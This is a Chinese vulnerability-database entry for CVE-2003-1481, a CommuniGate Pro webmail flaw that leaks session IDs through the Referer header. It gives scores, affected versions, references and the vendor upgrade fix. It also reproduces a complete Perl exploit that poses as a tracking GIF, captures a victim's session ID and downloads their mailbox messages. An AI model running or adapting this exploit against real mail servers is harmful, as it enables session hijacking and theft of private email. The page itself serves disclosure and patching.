CVE-2003-1481
CVSS5.8
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:37:03
NMCOE    

[原文]CommuniGate Pro 3.1 through 4.0.6 sends the session ID in the referer field for an HTTP request for an image, which allows remote attackers to hijack mail sessions via an e-mail with an IMG tag that references a malicious URL that captures the referer.


[CNNVD]CommuniGate Pro Webmail会话劫持漏洞(CNNVD-200312-077)

        CommuniGate Pro 3.1到4.0.6版本将会话ID发送给图像HTTP请求的参照字段。远程攻击者借助带IMG标签的电子邮件劫持邮件会话,该标签引用了捕获参照页的恶意URL。

- CVSS (基础分值)

CVSS分值: 5.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-200 [信息暴露]

- CPE (受影响的平台与产品)

cpe:/a:stalker:communigate_pro:4.0_b3
cpe:/a:stalker:communigate_pro:3.1
cpe:/a:stalker:communigate_pro:3.3.2
cpe:/a:stalker:communigate_pro:3.3_b2
cpe:/a:stalker:communigate_pro:4.0.3
cpe:/a:stalker:communigate_pro:3.4_b3
cpe:/a:stalker:communigate_pro:3.2.4
cpe:/a:stalker:communigate_pro:4.0.2
cpe:/a:stalker:communigate_pro:3.3_b1
cpe:/a:stalker:communigate_pro:3.2_b5
cpe:/a:stalker:communigate_pro:4.0.6
cpe:/a:stalker:communigate_pro:3.2_b7
cpe:/a:stalker:communigate_pro:4.0_b2
cpe:/a:stalker:communigate_pro:4.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1481
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1481
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-077
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/7501
(PATCH)  BID  7501
http://xforce.iss.net/xforce/xfdb/11932
(UNKNOWN)  XF  communigate-pro-session-hijacking(11932)
http://www.securityfocus.com/archive/1/320438
(UNKNOWN)  BUGTRAQ  20030504 CommuniGatePro 4.0.6 [EXPLOIT]
http://securityreason.com/securityalert/3290
(UNKNOWN)  SREASON  3290

- 漏洞信息

CommuniGate Pro Webmail会话劫持漏洞
中危 设计错误
2003-12-31 00:00:00 2003-12-31 00:00:00
远程  
        CommuniGate Pro 3.1到4.0.6版本将会话ID发送给图像HTTP请求的参照字段。远程攻击者借助带IMG标签的电子邮件劫持邮件会话,该标签引用了捕获参照页的恶意URL。

- 公告与补丁

        The vendor has addressed this vulnerability in version '4.1b2' of the product. Customers are advised to upgrade and employ 'UseCookies' option during configuration of the server.
        Stalker Communigate Pro 3.1
        
        Stalker Communigate Pro 3.2 b7
        
        Stalker Communigate Pro 3.2 b5
        
        Stalker Communigate Pro 3.2.4
        
        Stalker Communigate Pro 3.3 b2
        
        Stalker Communigate Pro 3.3 b1
        
        Stalker Communigate Pro 3.3.2
        
        Stalker Communigate Pro 3.4 b3
        
        Stalker Communigate Pro 4.0 b3
        
        Stalker Communigate Pro 4.0 b2
        
        Stalker Communigate Pro 4.0.1
        
        Stalker Communigate Pro 4.0.2
        
        Stalker Communigate Pro 4.0.3
        
        Stalker Communigate Pro 4.0.6
        

- 漏洞信息 (27)

CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit (EDBID:27)
linux remote
2003-05-05 Verified
80 Yaroslav Polyakov
N/A [点击下载]
#!/usr/bin/perl

# Below is exploit code. Place it into cgi-bin, then
# (recommended) make symlink from
# DocumentRoot/AnyImage.gif to shj.pl, configure
# at least $url variable, and possible other vars and
# send victim HTML message with img src to your
# AnyImage.gif. When victim will read message, script
# will download messages 1..10 from his mailbox (if
# sucessfull).

# Script will work even if "require fixed address" option
# enabled (set $abuseproxy=1), but it needs access to
# users proxy (IP will be detected automatically). So, if
# your victim uses same corporate proxy as you, then 
# you're lucky, you can own his mailbox! :)

# If victim uses HTTPS to access CGP webmail, use
# https:// link to image. some browsers will still send
# HTTP_REFERER if _both_ sites are https.
#
# session hijacking and mail downloading exploit for CommuniGatePro 4.0.6
#
# Yaroslav Polyakov. xenon@sysAttack.com www.sysAttack.com
#

use LWP::UserAgent;

# configuration vars
$logfile="/tmp/log";
$url="http://COMMUNIGATE/Session/%SID%/Message.wssp?Mailbox=INBOX&MSG=%N%";
$SIDREGEXP="Session/([0-9a-zA-Z\-]+)/";
$msglonum=1;
$msghinum=10;
$msgprefix="/tmp/hijacked-";
$abuseproxy=1;
$proxyport=3128;

sub printgif
{
$gif1x1="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\xff\x00\xc0\xc0\xc0
\x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00
\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b";


  print "Content-Type: image/gif\n";
  print "\n";
  print "$gif1x1";
}


open LOG, "> $logfile" || die("cant write to my log");
printgif;



$remote=$ENV{'REMOTE_ADDR'};
$referer=$ENV{'HTTP_REFERER'};
print LOG "remote: $remote\nreferer: $referer\n";
# if($referer=~/SID=([0-9a-zA-Z\-]+)/){
if($referer=~/$SIDREGEXP/){
                $SID=$1;
                print LOG "SID: $SID\n";
                }else{
                                print LOG "sorry, cant
find out SID\n";
                                exit;
                }



# create request
my $ua = new LWP::UserAgent;
$ua->agent("shj - sysAttack CGP session HiJack/1.0");

if($abuseproxy){
                print LOG "set proxy
http://$remote:$proxyport/\n";
                $ua->proxy('http',
"http://$remote:$proxyport/");
}

for($index=$msglonum;$index<=$msghinum;$index++){
               $eurl=$url;
                $eurl =~ s/%N%/$index/;
                $eurl =~ s/%SID%/$SID/;
                print LOG "fetching $eurl\n";
                $request = new HTTP::Request("GET", $eurl);
                $response = $ua->request($request);
                if($response){
                                print LOG
$response->code." ".$response->message
."\n";
                                open MSG, ">
$msgprefix$index" or die('cant crea
te $msgprefix$index');
                                print MSG
$response->content;
                                close MSG;
                }else{
                                print LOG "undefined
response\n";
                }
}
close LOG;



# milw0rm.com [2003-05-05]
		

- 漏洞信息

50621
CommuniGate Pro Referer Field Session Token Disclosure
Remote / Network Access, Context Dependent Authentication Management
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2003-05-03 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.1b2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站